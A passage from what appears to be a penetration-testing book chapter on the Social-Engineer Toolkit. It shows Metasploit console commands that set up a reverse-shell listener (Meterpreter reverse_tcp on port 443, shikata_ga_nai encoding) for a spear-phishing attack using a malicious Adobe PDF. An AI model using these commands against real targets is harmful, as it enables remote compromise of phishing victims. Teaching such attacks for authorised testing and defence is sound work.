background image

The Social-Engineer Toolkit


Finally, create a Metasploit listener for the payload to connect back to  . 

When SET launches Metasploit, it configures all the necessary options and 
starts to listen on your attacking IP address on port 443  , as configured 

 Do you want to setup a listener yes or no: 


resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (src/program_junk/meta_config)> set LHOST
resource (src/program_junk/meta_config)> set LPORT 443
LPORT => 443
resource (src/program_junk/meta_config)> set ENCODING shikata_ga_nai
ENCODING => shikata_ga_nai
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.

 [*] Started reverse handler on

[*] Starting the payload handler...
msf exploit(handler) >

We’ve just set up an attack against

, crafted an 

email to the recipient, and used an Adobe file format exploit. SET allowed 
us to create templates and have them dynamically imported when we use the 
tool. When the target opens the email and double-clicks the Adobe file, he’ll 
see something like Figure 10-1.

Figure 10-1: The target’s view of the infected PDF file